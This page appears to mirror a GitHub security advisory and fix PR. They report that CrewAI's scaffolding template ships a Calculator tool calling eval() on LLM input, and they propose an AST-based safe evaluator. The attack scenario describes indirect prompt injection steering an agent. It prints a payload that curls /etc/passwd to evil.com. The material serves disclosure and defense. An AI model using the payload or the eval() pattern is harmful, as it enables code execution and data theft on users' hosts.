crewai - ✅(Solved) Fix [Security] crewai create ships template with eval() on unsanitized LLM input [1 pull requests, 4 comments, 2 participants]

HeadyZhang · 2026-03-25T03:58:12Z

[crewai] The AGENTS.md template bundled with CrewAI's project scaffolding crewai create includes a Calculator tool example that uses eval on LLM-provided input… The `AGENTS.md` template bundled with CrewAI's project scaffolding (`crewai create`) includes a Calculator tool example that uses `eval()` on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template. **Severity**: MEDIUM **Rule**: AGENT-053 — Unsafe Code Execution Pattern in Template **OWASP Agentic Security Index**: ASI-09 — Improper Output Handling **Affected files**: - `lib/crewai/src/crewai/cli/templates/AGENTS.md` (line 773) # PR #5058: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template - Repository: crewAIInc/crewAI - Author: devin-ai-integration[bot] - State: open | merged: False - Link: https://github.com/crewAIInc/crewAI/pull/5058 ## Description (problem / solution / changelog) ## Summary Fixes #5056 — The Calculator tool example in the `AGENTS.md` template (shipped via `crewai create`) used `eval()` on unsanitized LLM input, creating a remote code execution vulnerability in every newly scaffolded project. Replaced `eval(expression)` with an AST-walking evaluator that only permits arithmetic operators (`+`, `-`, `*`, `/`, `**`) and numeric literals (`int`, `float`). No new dependencies required. Added 28 tests that extract the calculator source directly from the markdown template and verify: - Valid arithmetic expressions evaluate correctly (12 cases) - Malicious/unsafe inputs are rejected with `ValueError` or `SyntaxError` (14 cases) - The template no longer contains bare `eval()` (2 sanity checks) ## Review & Testing Checklist for Human - [ ] **Verify the AST evaluator is safe**: Confirm the `_safe_eval` function's whitelist approach (only `ast.Constant`, `ast.BinOp`, `ast.UnaryOp` with explicit operator map) cannot be bypassed. This is the core security claim. - [ ] **Evaluate template verbosity tradeoff**: The example grew from 4 lines to ~25 lines. Consider whether this level of detail is appropriate for a `@tool` decorator example, or if a simpler safe alternative (or removing the calculator entirely) would be better for the template's purpose. - [ ] **Check test extraction approach**: Tests use regex to extract code from the markdown file and `exec()` it. This keeps tests in sync with the template but is fragile to markdown structural changes (heading renames, code block reformatting). Decide if this coupling is acceptable. - [ ] **Run `crewai create crew test_project`** and verify the generated `AGENTS.md` contains the new safe calculator example. ### Notes - This only affects newly scaffolded projects. Existing projects that already copied the old template are not patched by this change. - The evaluator intentionally omits modulo (`%`) and floor division (`//`) — reasonable for a minimal example but worth noting. - `ZeroDivisionError` is not caught; it will bubble up naturally from `operator.truediv`, which is acceptable behavior. Link to Devin session: https://app.devin.ai/sessions/a69dae035ed249adb723d4efc6aec062 ## Changed files - `lib/crewai/src/crewai/cli/templates/AGENTS.md` (modified, +29/-2) - `lib/crewai/tests/cli/test_safe_calculator_template.py` (added, +184/-0) ## Fixed - Fixed by PR: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template (https://github.com/crewAIInc/crewAI/pull/5058) ## [Security] `crewai create` ships template with `eval()` on unsanitized LLM input ### Summary The `AGENTS.md` template bundled with CrewAI's project scaffolding (`crewai create`) includes a Calculator tool example that uses `eval()` on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template. **Severity**: MEDIUM **Rule**: AGENT-053 — Unsafe Code Execution Pattern in Template **OWASP Agentic Security Index**: ASI-09 — Improper Output Handling **Affected files**: - `lib/crewai/src/crewai/cli/templates/AGENTS.md` (line 773) ### Vulnerability Details The `AGENTS.md` template shipped with `crewai create` demonstrates a Calculator tool pattern: **Affected code** (`cli/templates/AGENTS.md:770-774`): ```python @tool("Calculator") def calculator(expression: str) -> str: """Evaluates a mathematical expression and returns the result.""" return str(eval(expression)) # <-- arbitrary code execution ``` This template is copied into new user projects when running `crewai create`. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output. ### Attack Scenario 1. A user runs `crewai create my_project` and gets a project with this Calculator tool 2. The user deploys their CrewAI agent (or uses it with web-sourced data) 3. Through indirect prompt injection (e.g., a malicious document or website the agent processes), the LLM is tricked into calling the Calculator tool with a malicious expression: ```python calculator("__imp

crewai2026-03-25 03:58:12

ON THIS PAGE

Recommended Tools

×6

Utilities matched from this issue’s tags and category — try them while you read without losing context.

GitHub issue graph ai analysis

Paste a GitHub issue URL. We fetch that issue, discover linked issues from bodies/comments/timeline, collect linked pull requests, and produce a structured English report.

The report is written in English Markdown for sharing and archival.

GitHub issue URL

Helpful · Quick feedback

GitHub stats

crewAIInc/crewAI#5056•Fetched 2026-04-08 01:29:57

View on GitHub

Comments

Participants

Timeline

Reactions

Author

HeadyZhang

Participants

HeadyZhang

xr843

Timeline (top)

cross-referenced ×5commented ×4referenced ×3

The AGENTS.md template bundled with CrewAI's project scaffolding (crewai create) includes a Calculator tool example that uses eval() on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template.

Severity: MEDIUM Rule: AGENT-053 — Unsafe Code Execution Pattern in Template OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773)

Root Cause

Severity: MEDIUM Rule: AGENT-053 — Unsafe Code Execution Pattern in Template OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773)

Fix Action

Fixed

Fixed by PR: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template (https://github.com/crewAIInc/crewAI/pull/5058)

PR fix notes

PR #5058: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template

Repository: crewAIInc/crewAI
Author: devin-ai-integration[bot]
State: open | merged: False
Link: https://github.com/crewAIInc/crewAI/pull/5058

Description (problem / solution / changelog)

Summary

Fixes #5056 — The Calculator tool example in the AGENTS.md template (shipped via crewai create) used eval() on unsanitized LLM input, creating a remote code execution vulnerability in every newly scaffolded project.

Replaced eval(expression) with an AST-walking evaluator that only permits arithmetic operators (+, -, *, /, **) and numeric literals (int, float). No new dependencies required.

Added 28 tests that extract the calculator source directly from the markdown template and verify:

Valid arithmetic expressions evaluate correctly (12 cases)
Malicious/unsafe inputs are rejected with ValueError or SyntaxError (14 cases)
The template no longer contains bare eval() (2 sanity checks)

Review & Testing Checklist for Human

Verify the AST evaluator is safe: Confirm the _safe_eval function's whitelist approach (only ast.Constant, ast.BinOp, ast.UnaryOp with explicit operator map) cannot be bypassed. This is the core security claim.
Evaluate template verbosity tradeoff: The example grew from 4 lines to ~25 lines. Consider whether this level of detail is appropriate for a @tool decorator example, or if a simpler safe alternative (or removing the calculator entirely) would be better for the template's purpose.
Check test extraction approach: Tests use regex to extract code from the markdown file and exec() it. This keeps tests in sync with the template but is fragile to markdown structural changes (heading renames, code block reformatting). Decide if this coupling is acceptable.
Run crewai create crew test_project and verify the generated AGENTS.md contains the new safe calculator example.

Notes

This only affects newly scaffolded projects. Existing projects that already copied the old template are not patched by this change.
The evaluator intentionally omits modulo (%) and floor division (//) — reasonable for a minimal example but worth noting.
ZeroDivisionError is not caught; it will bubble up naturally from operator.truediv, which is acceptable behavior.

Link to Devin session: https://app.devin.ai/sessions/a69dae035ed249adb723d4efc6aec062

Changed files

lib/crewai/src/crewai/cli/templates/AGENTS.md (modified, +29/-2)
lib/crewai/tests/cli/test_safe_calculator_template.py (added, +184/-0)

Code Example

@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    return str(eval(expression))  # <-- arbitrary code execution

---

calculator("__import__('os').system('curl https://evil.com/exfil?data=' + open('/etc/passwd').read())")

---

@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    import ast
    import operator

    # Safe operators whitelist
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        elif isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    tree = ast.parse(expression, mode='eval')
    return str(_eval(tree))

RAW_BUFFERClick to expand / collapse

[Security] `crewai create` ships template with `eval()` on unsanitized LLM input

Summary

Severity: MEDIUM Rule: AGENT-053 — Unsafe Code Execution Pattern in Template OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773)

Vulnerability Details

The AGENTS.md template shipped with crewai create demonstrates a Calculator tool pattern:

Affected code (cli/templates/AGENTS.md:770-774):

@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    return str(eval(expression))  # <-- arbitrary code execution

This template is copied into new user projects when running crewai create. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output.

Attack Scenario

A user runs crewai create my_project and gets a project with this Calculator tool
The user deploys their CrewAI agent (or uses it with web-sourced data)
Through indirect prompt injection (e.g., a malicious document or website the agent processes), the LLM is tricked into calling the Calculator tool with a malicious expression:
```
calculator("__import__('os').system('curl https://evil.com/exfil?data=' + open('/etc/passwd').read())")
```
The eval() call executes arbitrary Python code on the host machine

Impact

Remote code execution: Full Python code execution on the host system
Data exfiltration: Access to filesystem, environment variables, credentials
System compromise: Ability to install backdoors, modify files, pivot to internal networks

Suggested Fix

Replace eval() with a safe math expression evaluator. Alternatively, a simpler approach is to use the numexpr library or ast.literal_eval() for basic expressions. The implementation below requires no external dependencies:

@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    import ast
    import operator

    # Safe operators whitelist
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        elif isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    tree = ast.parse(expression, mode='eval')
    return str(_eval(tree))

Fix approach: Replace eval() with an AST-based safe math evaluator that only supports arithmetic operators and numeric literals. This preserves the Calculator functionality while preventing arbitrary code execution.

Detection

This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.

References

extent analysis

Fix Plan

To fix the remote code execution vulnerability in the crewai create template, follow these steps:

Replace the eval() function with a safe math expression evaluator in the calculator tool.
Use the provided AST-based safe math evaluator implementation.

Code Changes

Replace the affected code in lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773) with the following implementation:

@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    import ast
    import operator

    # Safe operators whitelist
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        elif isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    tree = ast.parse(expression, mode='eval')
    return str(_eval(tree))

Verification

To verify that the fix worked:

Run crewai create to generate a new project with the updated template.
Test the Calculator tool with various mathematical expressions to ensure it evaluates them correctly.
Attempt to inject malicious expressions to verify that the safe evaluator prevents arbitrary code execution.

Extra Tips

Regularly review and update your project templates to ensure they follow secure coding practices.
Use security scanning tools like agent-audit to detect vulnerabilities in your AI agent code.
Consider using a library like numexpr for more advanced mathematical expression evaluation.

Vote matrix · Quick signals

Works

Did the solution work? Tap to confirm.

Easy Fix

Was it a quick fix?

Time Saver

Did it save you time?

Blocking

Was it severely blocking?

Common Issue

Are others likely hitting this too?

Flaky / Intermittent

Is it intermittent?

Verified / Reproducible

Can you reproduce it reliably?

#database connection #vector store #embedding generation #cache error #environment variable

Still need to ship something?

×6

Another batch ranked right after the header list — different links, same matching logic.

Data

Security

Network

Code

UI/UX

Text

System

Multimedia

Protocol

API

Engineering

crewai - ✅(Solved) Fix [Security] crewai create ships template with eval() on unsanitized LLM input [1 pull requests, 4 comments, 2 participants]

Recommended Tools

GitHub issue graph ai analysis

Root Cause

Fix Action

Fixed

PR fix notes

PR #5058: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template

Description (problem / solution / changelog)

Summary

Review & Testing Checklist for Human

Notes

Changed files

Code Example

[Security] `crewai create` ships template with `eval()` on unsanitized LLM input

Summary

Vulnerability Details

Attack Scenario

Impact

Suggested Fix

Detection

References

extent analysis

Fix Plan

Code Changes

Verification

Extra Tips

Still need to ship something?

TRENDING

crewai - ✅(Solved) Fix [Security] crewai create ships template with eval() on unsanitized LLM input [1 pull requests, 4 comments, 2 participants]

Recommended Tools

GitHub issue graph ai analysis

Root Cause

Fix Action

Fixed

PR fix notes

PR #5058: fix: replace eval() with safe AST-based math evaluator in AGENTS.md template

Description (problem / solution / changelog)

Summary

Review & Testing Checklist for Human

Notes

Changed files

Code Example

[Security] crewai create ships template with eval() on unsanitized LLM input

Summary

Vulnerability Details

Attack Scenario

Impact

Suggested Fix

Detection

References

extent analysis

Fix Plan

Code Changes

Verification

Extra Tips

Still need to ship something?

RELATED_DISCOVERY

TRENDING

[Security] `crewai create` ships template with `eval()` on unsanitized LLM input